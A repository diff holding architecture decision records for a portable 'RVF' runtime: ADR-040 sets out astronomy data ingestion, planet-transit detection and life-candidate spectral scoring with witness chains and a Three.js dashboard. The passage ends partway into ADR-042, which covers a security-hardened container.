const solver = await RvfSolver.create();
const result = solver.train({ count: 100 });
console.log(`Accuracy: ${(result.accuracy * 100).toFixed(1)}%`);
solver.destroy();
```
### Related Packages
| Package | Description |
|---------|-------------|
| [`@ruvector/rvf`](https://www.npmjs.com/package/@ruvector/rvf) | Unified TypeScript SDK |
| [`@ruvector/rvf-node`](https://www.npmjs.com/package/@ruvector/rvf-node) | Native N-API bindings for Node.js |
| [`@ruvector/rvf-wasm`](https://www.npmjs.com/package/@ruvector/rvf-wasm) | Browser WASM package |
| [`@ruvector/rvf-mcp-server`](https://www.npmjs.com/package/@ruvector/rvf-mcp-server) | MCP server for AI agents |

View File

@@ -0,0 +1,859 @@
# ADR-040: Causal Atlas RVF Runtime — Planet Detection & Life Candidate Scoring
**Status:** Proposed
**Date:** 2026-02-18
**Author:** System Architect (AgentDB v3)
**Supersedes:** None
**Related:** ADR-003 (RVF Format), ADR-006 (Unified Self-Learning RVF), ADR-007 (Full Capability Integration), ADR-008 (Chat UI RVF)
**Package:** `@agentdb/causal-atlas`
## Context
ADR-008 demonstrated that a single RVF artifact can embed a minimal Linux
userspace, an LLM inference engine, and a self-learning pipeline into one
portable file. This ADR extends that pattern to scientific computing: a
portable RVF runtime that ingests public astronomy and physics datasets,
builds a multi-scale interaction graph, maintains a dynamic coherence field,
and emits replayable witness logs for every derived claim.
The design draws engineering inspiration from causal sets, loop-gravity-style
discretization, and holographic boundary encoding, but it is implemented as a
practical data system, not a physics simulator. The holographic principle
manifests as a concrete design choice: primarily store and index boundaries,
and treat interior state as reconstructable from boundary witnesses and
retained archetypes.
### Existing Capabilities (ADR-003 through ADR-008)
| Component | Package | Relevant APIs |
|-----------|---------|---------------|
| **RVF segments** | `@ruvector/rvf`, `@ruvector/rvf-node` | `embedKernel`, `extractKernel`, `embedEbpf`, `segments`, `derive` |
| **HNSW indexing** | `@ruvector/rvf-node` | `ingestBatch`, `query`, `compact`, HNSW with metadata filters |
| **Witness chains** | `@ruvector/rvf-node`, `RvfSolver` | `verifyWitness`, SHAKE-256 witness chains, signed root hash |
| **Graph transactions** | `NativeAccelerator` | `graphTransaction`, `graphBatchInsert`, Cypher queries |
| **SIMD embeddings** | `@ruvector/ruvllm` | 768-dim SIMD embed, cosine/dot/L2, HNSW memory search |
| **SONA learning** | `SonaLearningBackend` | Micro-LoRA, trajectory recording, EWC++ |
| **Federated coordination** | `FederatedSessionManager` | Cross-agent trajectories, warm-start patterns |
| **Contrastive training** | `ContrastiveTrainer` | InfoNCE, hard negative mining, 3-stage curriculum |
| **Adaptive index** | `AdaptiveIndexTuner` | 5-tier compression, Matryoshka truncation, health monitoring |
| **Kernel embedding** | `KernelBuilder` (ADR-008) | Minimal Linux boot from KERNEL_SEG + INITRD_SEG |
| **Lazy model download** | `ChatInference` (ADR-008) | Deferred GGUF load on first inference call |
### What This ADR Adds
1. Domain adapters for astronomy data (light curves, spectra, galaxy catalogs)
2. Compressed causal atlas with partial-order event graph
3. Coherence field index with cut pressure and partition entropy
4. Multi-scale interaction memory with budget-controlled tiered retention
5. Boundary evolution tracker with holographic-style boundary-first storage
6. Planet detection pipeline (Kepler/TESS transit search)
7. Life candidate scoring pipeline (spectral disequilibrium signatures)
8. Progressive data download from public sources on first activation
## Goal State
A single RVF artifact that boots a minimal Linux userspace, progressively
downloads and ingests public astronomy and physics datasets on first
activation (lazy, like ADR-008's GGUF model download), builds a multi-scale
interaction graph, maintains a dynamic coherence field, and emits replayable
witness logs for every derived claim.
### Primary Outputs
| # | Output | Description |
|---|--------|-------------|
| 1 | **Atlas snapshots** | Queryable causal partial order plus embeddings |
| 2 | **Coherence field** | Partition tree plus cut pressure signals over time |
| 3 | **Multi-scale memory** | Delta-encoded interaction history from seconds to micro-windows |
| 4 | **Boundary tracker** | Boundary changes, drift, and anomaly alerts |
| 5 | **Planet candidates** | Ranked list with traceable evidence |
| 6 | **Life candidates** | Ranked list of spectral disequilibrium signatures with traceable evidence |
### Non-Goals
1. Proving quantum gravity
2. Replacing astrophysical pipelines end-to-end
3. Claiming life detection without conventional follow-up observation
## Public Data Sources
All data is progressively downloaded from public archives on first activation.
The RVF artifact ships with download manifests and integrity hashes, not the
raw data itself.
### Planet Finding
| Source | Access | Reference |
|--------|--------|-----------|
| Kepler light curves and pixel files | MAST bulk and portal | [archive.stsci.edu/kepler](https://archive.stsci.edu/missions-and-data/kepler) |
| TESS light curves and full-frame images | MAST portal | [archive.stsci.edu/tess](https://archive.stsci.edu/missions-and-data/tess) |
### Life-Relevant Spectra
| Source | Access | Reference |
|--------|--------|-----------|
| JWST exoplanet spectra | exo.MAST and MAST holdings | [archive.stsci.edu](https://archive.stsci.edu/home) |
| NASA Exoplanet Archive parameters | Cross-linking to spectra and mission products | [exoplanetarchive.ipac.caltech.edu](https://exoplanetarchive.ipac.caltech.edu/) |
### Large-Scale Structure
| Source | Access | Reference |
|--------|--------|-----------|
| SDSS public catalogs (spectra, redshifts) | DR17 | [sdss4.org/dr17](https://www.sdss4.org/dr17/) |
### Progressive Download Strategy
Following the lazy-download pattern established in ADR-008 for GGUF models:
1. **Manifest-first**: RVF ships with `MANIFEST_SEG` containing download URLs,
SHA-256 hashes, expected sizes, and priority tiers
2. **Tier 0 (boot)**: Minimal curated dataset (~50 MB) for offline demo —
100 Kepler targets with known confirmed planets, embedded in VEC_SEG
3. **Tier 1 (first run)**: Download 1,000 Kepler targets on first pipeline
activation. Background download, progress reported via CLI/HTTP
4. **Tier 2 (expansion)**: Full Kepler/TESS catalog download on explicit
`rvf ingest --expand` command
5. **Tier 3 (spectra)**: JWST and archive spectra downloaded when life
candidate pipeline is first activated
6. **Seal-on-complete**: After download, data is ingested into VEC_SEG and
INDEX_SEG, a new witness root is committed, and the RVF is sealed into
a reproducible snapshot
```
Download state machine:
[boot] ──first-inference──> [downloading-tier-1]
│ │
│ (offline demo works) │ (progress: 0-100%)
│ │
▼ ▼
[tier-0-only] [tier-1-ready]
rvf ingest --expand
[tier-2-ready]
life pipeline activated
[tier-3-ready] ──seal──> [sealed-snapshot]
```
Each tier download:
- Resumes from last byte on interruption (HTTP Range headers)
- Validates SHA-256 after download
- Commits a witness record for the download event
- Can be skipped with `--offline` flag (uses whatever is already present)
## RVF Artifact Layout
Extends the ADR-003 segment model with domain-specific segments.
| # | Segment | Contents |
|---|---------|----------|
| 1 | `MANIFEST_SEG` | Segment table, hashes, policy, budgets, version gates, **download manifests** |
| 2 | `KERNEL_SEG` | Minimal Linux kernel image for portable boot (reuse ADR-008) |
| 3 | `INITRD_SEG` | Minimal userspace: busybox, RuVector binaries, data ingest tools, query server |
| 4 | `EBPF_SEG` | Socket allow-list and syscall reduction. Default: local loopback + explicit download ports only |
| 5 | `VEC_SEG` | Embedding vectors: light-curve windows, spectrum windows, graph node descriptors, partition boundary descriptors |
| 6 | `INDEX_SEG` | HNSW unified attention index for vectors and boundary descriptors |
| 7 | `GRAPH_SEG` | Dynamic interaction graph: nodes, edges, timestamps, authority, provenance |
| 8 | `DELTA_SEG` | Append-only change log of graph updates and field updates |
| 9 | `WITNESS_SEG` | Deterministic witness chain: canonical serialization, signed root hash progression |
| 10 | `POLICY_SEG` | Data provenance requirements, candidate publishing thresholds, deny rules, confidence floors |
| 11 | `DASHBOARD_SEG` | Vite-bundled Three.js visualization app — static assets served by runtime HTTP server |
## Data Model
### Core Entities
```typescript
interface Event {
id: string;
t_start: number; // epoch seconds
t_end: number;
domain: 'kepler' | 'tess' | 'jwst' | 'sdss' | 'derived';
payload_hash: string; // SHA-256 of raw data window
provenance: Provenance;
}
interface Observation {
id: string;
instrument: string; // 'kepler-lc' | 'tess-ffi' | 'jwst-nirspec' | ...
target_id: string; // e.g., KIC or TIC identifier
data_pointer: string; // segment offset into VEC_SEG
calibration_version: string;
provenance: Provenance;
}
interface InteractionEdge {
src_event_id: string;
dst_event_id: string;
type: 'causal' | 'periodicity' | 'shape_similarity' | 'co_occurrence' | 'spatial';
weight: number;
lag: number; // temporal lag in seconds
confidence: number;
provenance: Provenance;
}
interface Boundary {
boundary_id: string;
partition_left_set_hash: string;
partition_right_set_hash: string;
cut_weight: number;
cut_witness: string; // witness chain reference
stability_score: number;
}
interface Candidate {
candidate_id: string;
category: 'planet' | 'life';
evidence_pointers: string[]; // event and edge IDs
score: number;
uncertainty: number;
publishable: boolean; // based on POLICY_SEG rules
witness_trace: string; // WITNESS_SEG reference for replay
}
interface Provenance {
source: string; // 'mast-kepler' | 'mast-tess' | 'mast-jwst' | ...
download_witness: string; // witness chain entry for the download
transform_chain: string[]; // ordered list of transform IDs applied
timestamp: string; // ISO-8601
}
```
### Domain Adapters
#### Planet Transit Adapter
```
Input: flux time series + cadence metadata (Kepler/TESS FITS)
Output: Event nodes for windows
InteractionEdges for periodicity hints and shape similarity
Candidate nodes for dip detections
```
#### Spectrum Adapter
```
Input: wavelength, flux, error arrays (JWST NIRSpec, etc.)
Output: Event nodes for band windows
InteractionEdges for molecule feature co-occurrence
Disequilibrium score components
```
#### Cosmic Web Adapter (optional, Phase 2+)
```
Input: galaxy positions and redshifts (SDSS)
Output: Graph of spatial adjacency and filament membership
```
## The Four System Constructs
### 1. Compressed Causal Atlas
**Definition**: A partial order of events plus minimal sufficient descriptors
to reproduce derived edges.
**Construction**:
1. **Windowing** — Light curves into overlapping windows at multiple scales
- Scales: 2 hours, 12 hours, 3 days, 27 days
2. **Feature extraction** — Robust features per window
- Flux derivative statistics
- Autocorrelation peaks
- Wavelet energy bands
- Transit-shaped matched filter response
3. **Embedding** — RuVector SIMD embed per window, stored in VEC_SEG
4. **Causal edges** — Add edge when window A precedes window B and improves
predictability of B (conditional mutual information proxy or prediction gain,
subject to POLICY_SEG constraints)
- Edge weight: prediction gain magnitude
- Provenance: exact windows, transform IDs, threshold used
5. **Atlas compression**
- Keep only top-k causal parents per node
- Retain stable boundary witnesses
- Delta-encode updates into DELTA_SEG
**Output API**:
| Endpoint | Returns |
|----------|---------|
| `atlas.query(event_id)` | Parents, children, plus provenance |
| `atlas.trace(candidate_id)` | Minimal causal chain for a candidate |
### 2. Coherence Field Index
**Definition**: A field over the atlas graph that assigns coherence pressure
and cut stability over time.
**Signals**:
| Signal | Description |
|--------|-------------|
| Cut pressure | Minimum cut values over selected subgraphs |
| Partition entropy | Distribution of cluster sizes and churn rate |
| Disagreement | Cross-detector disagreement rate |
| Drift | Embedding distribution shift in sliding window |
**Algorithm**:
1. Maintain a partition tree. Update with dynamic min-cut on incremental
graph changes
2. For each update epoch:
- Compute cut witnesses for top boundaries
- Emit boundary events into GRAPH_SEG
- Append witness record into WITNESS_SEG
3. Index boundaries via descriptor vector:
- Cut value, partition sizes, local graph curvature proxy, recent churn
**Query API**:
| Endpoint | Returns |
|----------|---------|
| `coherence.get(target_id, epoch)` | Field values for target at epoch |
| `boundary.nearest(descriptor)` | Similar historical boundary states via INDEX_SEG |
### 3. Multi-Scale Interaction Memory
**Definition**: A memory that retains interactions at multiple time resolutions
with strict budget control.
**Three tiers**:
| Tier | Resolution | Content |
|------|-----------|---------|
| **S** | Seconds to minutes | High-fidelity deltas |
| **M** | Hours to days | Aggregated deltas |
| **L** | Weeks to months | Boundary summaries and archetypes |
**Retention rules**:
1. Preserve events that are boundary-critical
2. Preserve events that are candidate evidence
3. Compress everything else via archetype clustering in INDEX_SEG
**Mechanism**:
- DELTA_SEG is append-only
- Periodic compaction produces a new RVF root with a witness proof of
preservation rules applied
### 4. Boundary Evolution Tracker
**Definition**: A tracker that treats boundaries as primary objects that evolve
over time.
**This is where the holographic flavor is implemented.** You primarily store
and index boundaries, and treat interior state as reconstructable from boundary
witnesses and retained archetypes.
**Output API**:
| Endpoint | Returns |
|----------|---------|
| `boundary.timeline(target_id)` | Boundary evolution over time |
| `boundary.alerts` | Alerts when: cut pressure spikes, boundary identity flips, disagreement exceeds threshold, drift persists beyond policy |
## Planet Detection Pipeline
### Stage P0: Ingest
**Input**: Kepler or TESS light curves from MAST (progressively downloaded)
1. Normalize flux
2. Remove obvious systematics (detrending)
3. Segment into windows and store as Event nodes
### Stage P1: Candidate Generation
1. Matched filter bank for transit-like dips
2. Period search on candidate dip times (BLS or similar)
3. Create Candidate node per period hypothesis
### Stage P2: Coherence Gating
Candidate must pass all gates:
| Gate | Requirement |
|------|-------------|
| Multi-scale stability | Stable across multiple window scales |
| Boundary consistency | Consistent boundary signature around transit times |
| Low drift | Drift below threshold across adjacent windows |
**Score components**:
| Component | Description |
|-----------|-------------|
| SNR-like strength | Signal-to-noise of transit dip |
| Shape consistency | Cross-transit shape agreement |
| Period stability | Variance of period estimates |
| Coherence stability | Coherence field stability around candidate |
**Emit**: Candidate with evidence pointers + witness trace listing exact
windows, transforms, and thresholds used.
## Life Candidate Pipeline
Life detection here means pre-screening for non-equilibrium atmospheric
chemistry signatures, not proof.
### Stage L0: Ingest
**Input**: Published or mission spectra tied to targets via MAST and NASA
Exoplanet Archive (progressively downloaded on first pipeline activation)
1. Normalize and denoise within instrument error model
2. Window spectra by wavelength bands
3. Create band Event nodes
### Stage L1: Feature Extraction
1. Identify absorption features and confidence bands
2. Encode presence vectors for key molecule families (H2O, CO2, CH4, O3, NH3, etc.)
3. Build InteractionEdges between features that co-occur in physically
meaningful patterns
### Stage L2: Disequilibrium Scoring
**Core concept**: Life-like systems maintain chemical ratios that resist
thermodynamic relaxation.
**Implementation as graph scoring**:
1. Build a reaction plausibility graph (prior rule set in POLICY_SEG)
2. Compute inconsistency score between observed co-occurrences and expected
equilibrium patterns
3. Track stability of that score across epochs and observation sets
**Score components**:
| Component | Description |
|-----------|-------------|
| Persistent multi-molecule imbalance | Proxy for non-equilibrium chemistry |
| Feature repeatability | Agreement across instruments or visits |
| Contamination risk penalty | Instrument artifact and stellar contamination |
| Stellar activity confound penalty | Host star variability coupling |
**Output**: Life candidate list with explicit uncertainty + required follow-up
observations list generated by POLICY_SEG rules.
## Runtime and Portability
### Boot Sequence
1. RVF boots minimal Linux from KERNEL_SEG and INITRD_SEG (reuse ADR-008 `KernelBuilder`)
2. Starts `rvf-runtime` daemon exposing local HTTP and CLI
3. On first inference/query, progressively downloads required data tier
### Local Interfaces
**CLI**:
```bash
rvf run artifact.rvf # boot the runtime
rvf query planet list # ranked planet candidates
rvf query life list # ranked life candidates
rvf trace <candidate_id> # full witness trace for any candidate
rvf ingest --expand # download tier-2 full catalog
rvf status # download progress, segment sizes, witness count
```
**HTTP**:
```
GET / # Three.js dashboard (served from DASHBOARD_SEG)
GET /assets/* # Dashboard static assets
GET /api/atlas/query?event_id=... # causal parents/children
GET /api/atlas/trace?candidate_id=... # minimal causal chain
GET /api/coherence?target_id=...&epoch= # field values
GET /api/boundary/timeline?target_id=...
GET /api/boundary/alerts
GET /api/candidates/planet # ranked planet list
GET /api/candidates/life # ranked life list
GET /api/candidates/:id/trace # witness trace
GET /api/status # system health + download progress
GET /api/memory/tiers # tier S/M/L utilization
WS /ws/live # real-time boundary alerts, pipeline progress, candidate updates
```
### Determinism
1. Fixed seeds for all stochastic operations
2. Canonical serialization of every intermediate artifact
3. Witness chain commits after each epoch
4. Two-machine reproducibility: identical RVF root hash for identical input
### Security Defaults
1. Network off by default
2. If enabled, eBPF allow-list: MAST/archive download ports + local loopback only
3. No remote writes without explicit policy toggle in POLICY_SEG
4. Downloaded data verified against MANIFEST_SEG hashes before ingestion
## Three.js Visualization Dashboard
The RVF embeds a Vite-bundled Three.js dashboard in `DASHBOARD_SEG`. The
runtime HTTP server serves it at `/` (root). All visualizations are driven
by the same API endpoints the CLI uses, so every rendered frame corresponds
to queryable, witness-backed data.
### Architecture
```
DASHBOARD_SEG (inside RVF)
dist/
index.html # Vite SPA entry
assets/
main.[hash].js # Three.js + D3 + app logic (tree-shaken)
main.[hash].css # Tailwind/minimal styles
worker.js # Web Worker for graph layout
Runtime serves:
GET / -> DASHBOARD_SEG/dist/index.html
GET /assets/* -> DASHBOARD_SEG/dist/assets/*
GET /api/* -> JSON API (atlas, coherence, candidates, etc.)
WS /ws/live -> Live streaming of boundary alerts and pipeline progress
```
**Build pipeline**: Vite builds the dashboard at package time into a single
tree-shaken bundle. The bundle is embedded into `DASHBOARD_SEG` during RVF
assembly. No Node.js required at runtime — the dashboard is pure static
assets served by the existing HTTP server.
### Dashboard Views
#### V1: Causal Atlas Explorer (Three.js 3D)
Interactive 3D force-directed graph of the causal atlas.
| Feature | Implementation |
|---------|---------------|
| **Node rendering** | `THREE.InstancedMesh` for events — color by domain (Kepler=blue, TESS=cyan, JWST=gold, derived=white) |
| **Edge rendering** | `THREE.LineSegments` with opacity mapped to edge weight |
| **Causal flow** | Animated particles along causal edges showing temporal direction |
| **Scale selector** | Toggle between window scales (2h, 12h, 3d, 27d) — re-layouts graph |
| **Candidate highlight** | Click candidate in sidebar to trace its causal chain in 3D, dimming unrelated nodes |
| **Witness replay** | Step through witness chain entries, animating graph state forward/backward |
| **LOD** | Level-of-detail: far=boundary nodes only, mid=top-k events, close=full subgraph |
Data source: `GET /api/atlas/query`, `GET /api/atlas/trace`
#### V2: Coherence Field Heatmap (Three.js + shader)
Real-time coherence field rendered as a colored surface over the atlas graph.
| Feature | Implementation |
|---------|---------------|
| **Field surface** | `THREE.PlaneGeometry` subdivided grid, vertex colors from coherence values |
| **Cut pressure** | Red hotspots where cut pressure is high, cool blue where stable |
| **Partition boundaries** | Glowing wireframe lines at partition cuts |
| **Time scrubber** | Scrub through epochs to see coherence evolution |
| **Drift overlay** | Toggle to show embedding drift as animated vector arrows |
| **Alert markers** | Pulsing icons at boundary alert locations |
Data source: `GET /api/coherence`, `GET /api/boundary/timeline`, `WS /ws/live`
#### V3: Planet Candidate Dashboard (2D panels + 3D orbit)
Split view combining data panels with 3D orbital visualization.
| Panel | Content |
|-------|---------|
| **Ranked list** | Sortable table: candidate ID, score, uncertainty, period, SNR, publishable status |
| **Light curve viewer** | Interactive D3 chart: raw flux, detrended flux, transit model overlay, per-window score |
| **Phase-folded plot** | All transits folded at detected period, with confidence band |
| **3D orbit preview** | `THREE.Line` showing inferred orbital path around host star, sized by uncertainty |
| **Evidence trace** | Expandable tree showing witness chain from raw data to final score |
| **Score breakdown** | Radar chart: SNR, shape consistency, period stability, coherence stability |
Data source: `GET /api/candidates/planet`, `GET /api/candidates/:id/trace`
#### V4: Life Candidate Dashboard (2D panels + 3D molecule)
Split view for spectral disequilibrium analysis.
| Panel | Content |
|-------|---------|
| **Ranked list** | Sortable table: candidate ID, disequilibrium score, uncertainty, molecule flags, publishable |
| **Spectrum viewer** | Interactive D3 chart: wavelength vs flux, molecule absorption bands highlighted |
| **Molecule presence matrix** | Heatmap of detected molecule families vs confidence |
| **3D molecule overlay** | `THREE.Sprite` labels at absorption wavelengths in a 3D wavelength space |
| **Reaction graph** | Force-directed graph of molecule co-occurrences vs equilibrium expectations |
| **Confound panel** | Bar chart: stellar activity penalty, contamination risk, repeatability score |
Data source: `GET /api/candidates/life`, `GET /api/candidates/:id/trace`
#### V5: System Status Dashboard
Operational health and download progress.
| Panel | Content |
|-------|---------|
| **Download progress** | Per-tier progress bars with byte counts and ETA |
| **Segment sizes** | Stacked bar chart of RVF segment utilization |
| **Memory tiers** | S/M/L tier fill levels and compaction history |
| **Witness chain** | Scrolling log of recent witness entries with hash preview |
| **Pipeline status** | P0/P1/P2 and L0/L1/L2 stage indicators with event counts |
| **Performance** | Query latency histogram, events/second throughput |
Data source: `GET /api/status`, `GET /api/memory/tiers`, `WS /ws/live`
### WebSocket Live Stream
```typescript
// WS /ws/live — server pushes events as they happen
interface LiveEvent {
type: 'boundary_alert' | 'candidate_new' | 'candidate_update' |
'download_progress' | 'witness_commit' | 'pipeline_stage' |
'coherence_update';
timestamp: string;
data: Record<string, unknown>;
}
```
The dashboard subscribes on connect and updates all views in real-time as
pipelines process data and boundaries evolve.
### Vite Build Configuration
```typescript
// vite.config.ts for dashboard build
import { defineConfig } from 'vite';
export default defineConfig({
build: {
outDir: 'dist/dashboard',
assetsDir: 'assets',
rollupOptions: {
output: {
manualChunks: {
three: ['three'], // ~150 KB gzipped
d3: ['d3-scale', 'd3-axis', 'd3-shape', 'd3-selection'],
},
},
},
},
});
```
**Bundle budget**: < 500 KB gzipped total (Three.js ~150 KB, D3 subset ~30 KB,
app logic ~50 KB, styles ~10 KB). The dashboard adds minimal overhead to the
RVF artifact.
### Design Decision: D5 — Dashboard Embedded in RVF
The Three.js dashboard is bundled at build time and embedded in `DASHBOARD_SEG`
rather than served from an external CDN or requiring a separate install. This
ensures:
1. **Fully offline**: Works without network after boot
2. **Version-locked**: Dashboard always matches the API version it queries
3. **Single artifact**: One RVF file = runtime + data + visualization
4. **Witness-aligned**: Dashboard renders exactly the data the witness chain
can verify
## Package Structure
```
packages/agentdb-causal-atlas/
src/
index.ts # createCausalAtlasServer() factory
CausalAtlasServer.ts # HTTP + CLI runtime + dashboard serving + WS
CausalAtlasEngine.ts # Core atlas, coherence, memory, boundary
adapters/
PlanetTransitAdapter.ts # Kepler/TESS light curve ingestion
SpectrumAdapter.ts # JWST/archive spectral ingestion
CosmicWebAdapter.ts # SDSS spatial graph (Phase 2)
pipelines/
PlanetDetection.ts # P0-P2 planet detection pipeline
LifeCandidate.ts # L0-L2 life candidate pipeline
constructs/
CausalAtlas.ts # Compressed causal partial order
CoherenceField.ts # Partition tree + cut pressure
MultiScaleMemory.ts # Tiered S/M/L retention
BoundaryTracker.ts # Boundary evolution + alerts
download/
ProgressiveDownloader.ts # Tiered lazy download with resume
DataManifest.ts # URL + hash + size manifests
KernelBuilder.ts # Reuse/extend from ADR-008
dashboard/ # Vite + Three.js visualization app
vite.config.ts # Build config — outputs to dist/dashboard/
index.html # SPA entry point
src/
main.ts # App bootstrap, router, WS connection
api.ts # Typed fetch wrappers for /api/* endpoints
ws.ts # WebSocket client for /ws/live
views/
AtlasExplorer.ts # V1: 3D causal atlas (Three.js force graph)
CoherenceHeatmap.ts # V2: Coherence field surface + cut pressure
PlanetDashboard.ts # V3: Planet candidates + light curves + 3D orbit
LifeDashboard.ts # V4: Life candidates + spectra + molecule graph
StatusDashboard.ts # V5: System health, downloads, witness log
three/
AtlasGraph.ts # InstancedMesh nodes, LineSegments edges, particles
CoherenceSurface.ts # PlaneGeometry with vertex-colored field
OrbitPreview.ts # Orbital path visualization
CausalFlow.ts # Animated particles along causal edges
LODController.ts # Level-of-detail: boundary → top-k → full
charts/
LightCurveChart.ts # D3 flux time series with transit overlay
SpectrumChart.ts # D3 wavelength vs flux with molecule bands
RadarChart.ts # Score breakdown radar
MoleculeMatrix.ts # Heatmap of molecule presence vs confidence
components/
Sidebar.ts # Candidate list, filters, search
TimeScrubber.ts # Epoch scrubber for coherence replay
WitnessLog.ts # Scrolling witness chain entries
DownloadProgress.ts # Tier progress bars
styles/
main.css # Minimal Tailwind or hand-rolled styles
tests/
causal-atlas.test.ts
planet-detection.test.ts
life-candidate.test.ts
progressive-download.test.ts
coherence-field.test.ts
boundary-tracker.test.ts
dashboard.test.ts # Dashboard build + API integration tests
```
## Implementation Phases
### Phase 1: Core Atlas + Planet Detection + Dashboard Shell (v0.1)
**Scope**: Kepler and TESS only. No spectra. No life scoring.
1. Implement `ProgressiveDownloader` with tier-0 curated dataset (100 Kepler targets)
2. Implement `PlanetTransitAdapter` for FITS light curve ingestion
3. Implement `CausalAtlas` with windowing, feature extraction, SIMD embedding
4. Implement `PlanetDetection` pipeline (P0-P2)
5. Implement `WITNESS_SEG` with SHAKE-256 chain
6. CLI: `rvf run`, `rvf query planet list`, `rvf trace`
7. HTTP: `/api/candidates/planet`, `/api/atlas/trace`
8. Dashboard: Vite scaffold, V1 Atlas Explorer (Three.js 3D graph), V3 Planet
Dashboard (ranked list + light curve chart), V5 Status Dashboard (download
progress + witness log). Embedded in `DASHBOARD_SEG`, served at `/`
9. WebSocket `/ws/live` for real-time pipeline progress
**Acceptance**: 1,000 Kepler targets, top-100 ranked list includes >= 80
confirmed planets, every item replays to same score and witness root on two
machines. Dashboard renders atlas graph and candidate list in browser.
### Phase 2: Coherence Field + Boundary Tracker + Dashboard V2 (v0.2)
1. Implement `CoherenceField` with dynamic min-cut, partition entropy
2. Implement `BoundaryTracker` with timeline and alerts
3. Implement `MultiScaleMemory` with S/M/L tiers and budget control
4. Add coherence gating to planet pipeline
5. HTTP: `/api/coherence`, `/api/boundary/*`, `/api/memory/tiers`
6. Dashboard: V2 Coherence Heatmap (Three.js field surface + cut pressure
overlay + time scrubber), boundary alert markers via WebSocket
### Phase 3: Life Candidate Pipeline + Dashboard V4 (v0.3)
1. Implement `SpectrumAdapter` for JWST/archive spectral data
2. Implement `LifeCandidate` pipeline (L0-L2)
3. Implement disequilibrium scoring with reaction plausibility graph
4. Tier-3 progressive download for spectral data
5. CLI: `rvf query life list`
6. HTTP: `/api/candidates/life`
7. Dashboard: V4 Life Dashboard (spectrum viewer + molecule presence matrix
+ reaction graph + confound panel)
**Acceptance**: Published spectra with known atmospheric detections vs nulls,
AUC > 0.8, every score includes confound penalties and provenance trace.
Dashboard renders spectrum analysis in browser.
### Phase 4: Cosmic Web + Full Integration (v0.4)
1. `CosmicWebAdapter` for SDSS spatial graph
2. Cross-domain coherence (planet candidates enriched by large-scale context)
3. Dashboard: 3D cosmic web view, cross-domain candidate linking
4. Full offline demo with sealed RVF snapshot
5. `rvf ingest --expand` for tier-2 bulk download
6. Dashboard polish: LOD optimization, mobile-responsive layout, dark/light theme
## Evaluation Plan
### Planet Detection Acceptance Test
| Metric | Requirement |
|--------|-------------|
| Recall@100 | >= 80 confirmed planets in top 100 |
| False positives@100 | Documented with witness traces |
| Median time per star | Measured and reported |
| Reproducibility | Identical root hash on two machines |
### Life Candidate Acceptance Test
| Metric | Requirement |
|--------|-------------|
| AUC (detected vs null) | > 0.8 |
| Confound penalties | Present on every score |
| Provenance trace | Complete for every score |
### System Acceptance Test
| Test | Requirement |
|------|-------------|
| Boot reproducibility | Identical root hash across two machines |
| Query determinism | Identical results for same dataset snapshot |
| Witness verification | `verifyWitness` passes for all chains |
| Progressive download | Resumes correctly after interruption |
## Failure Modes and Fix Path
| Failure | Fix |
|---------|-----|
| Noise dominates coherence field | Strengthen policy priors, add confound penalties, enforce multi-epoch stability |
| Over-compression kills rare signals | Boundary-critical retention rules + candidate evidence pinning |
| Spurious life signals from stellar activity | Model stellar variability as its own interaction graph, penalize coupling |
| Compute blow-up | Strict budgets in POLICY_SEG, tiered memory, boundary-first indexing |
| Download interruption | HTTP Range resume, partial-ingest checkpoint, witness for partial state |
## Design Decisions
### D1: Kepler/TESS only in v1, spectra in v3
Phase 1 delivers a concrete, testable planet-detection system. Life scoring
requires additional instrument-specific adapters and more nuanced policy
rules. Separating them de-risks the schedule.
### D2: Progressive download with embedded demo subset
The RVF artifact ships with a curated ~50 MB tier-0 dataset for fully offline
demonstration. Full catalog data is downloaded lazily, following the pattern
proven in ADR-008 for GGUF model files. This keeps the initial artifact small
(< 100 MB without kernel) while supporting the full 1,000+ target benchmark.
### D3: Boundary-first storage (holographic principle)
Boundaries are stored as first-class indexed objects. Interior state is
reconstructed on-demand from boundary witnesses and retained archetypes.
This reduces storage by 10-50x for large graphs while preserving
queryability and reproducibility.
### D4: Witness chain for every derived claim
Every candidate, every coherence measurement, and every boundary change is
committed to the SHAKE-256 witness chain. This enables two-machinevisu
reproducibility verification and provides a complete audit trail from raw
data to final score.
## References
1. [MAST — Kepler](https://archive.stsci.edu/missions-and-data/kepler)
2. [MAST — TESS](https://archive.stsci.edu/missions-and-data/tess)
3. [MAST Home](https://archive.stsci.edu/home)
4. [NASA Exoplanet Archive](https://exoplanetarchive.ipac.caltech.edu/)
5. [SDSS DR17](https://www.sdss4.org/dr17/)
6. ADR-003: RVF Native Format Integration
7. ADR-006: Unified Self-Learning RVF Integration
8. ADR-007: RuVector Full Capability Integration
9. ADR-008: Chat UI RVF Kernel Embedding

View File

@@ -0,0 +1,308 @@
# ADR-042: Security RVF — AIDefence + TEE Hardened Cognitive Container
| Field | Value |
|-------------|------------------------------------------------|
| Status | Accepted |
| Date | 2025-02-21 |
| Authors | ruv |
| Supersedes | — |
| Implements | ADR-041 Tier 1 (Security Container) |
## Context
ADR-041 identified 15 npm packages suitable for RVF cognitive containers. This ADR
specifies the **ultimate security RVF** — a single `.rvf` file that combines:
1. **AIDefence** — 5-layer adversarial defense (prompt injection, jailbreak, PII, behavioral, policy)
2. **TEE attestation** — Hardware-bound trust (SGX, SEV-SNP, TDX, ARM CCA)
3. **Hardened Linux microkernel** — Minimal attack surface boot image + KernelBinding anti-tamper
4. **Coherence Gate** — Anytime-valid permission authorization
5. **RBAC + Ed25519 signing** — Role-based access with cryptographic proof
6. **Witness chain audit** — Tamper-evident hash-chained event log
7. **Self-bootstrapping** — Dual WASM (Interpreter + Microkernel) for standalone execution
8. **Dashboard** — Embedded security monitoring UI (DASHBOARD_SEG)
9. **Quantization** — Scalar (int8, 4x) + Binary (1-bit, 32x) compression
10. **Lifecycle** — Filter deletion, compaction, and permanent freeze/seal
The result is a self-contained, bootable, cryptographically sealed security appliance
with 30 verified capabilities, end-to-end from silicon to application layer.
## Decision
Build `security_hardened.rvf` as a capstone example in `examples/rvf/examples/` that
exercises every security primitive in the RVF format.
## Architecture
```
security_hardened.rvf
├── KERNEL_SEG (0x0E) Hardened Linux 6.x + KernelBinding (128B anti-tamper)
├── EBPF_SEG (0x0F) Packet filter + syscall policy enforcer
├── WASM_SEG #1 (0x10) AIDefence engine (prompt injection, PII, jailbreak)
├── WASM_SEG #2 (0x10) Interpreter runtime (self-bootstrapping)
├── DASHBOARD_SEG (0x11) Security monitoring web UI
├── VEC_SEG (0x01) Threat signature embeddings (512-dim)
